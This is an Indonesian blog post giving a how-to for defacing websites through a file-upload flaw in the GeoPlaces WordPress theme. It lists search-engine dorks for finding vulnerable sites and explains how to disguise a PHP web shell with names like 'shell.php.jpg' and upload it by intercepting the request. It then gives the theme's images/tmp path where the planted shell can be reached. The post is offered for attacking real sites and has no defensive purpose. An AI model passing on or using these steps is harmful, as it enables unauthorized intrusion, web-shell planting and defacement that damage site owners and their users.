Home » Deface Website » Cara Deface Dengan Shell upload vulnerability

Jumat, 22 Maret 2013

Cara Deface Dengan Shell upload vulnerability 

Langsung saja ;) 
 
Dork    :

inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 

 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 
 

Posted in:
Posting Lebih Baru Posting Lama Beranda

0 Komentar:

Posting Komentar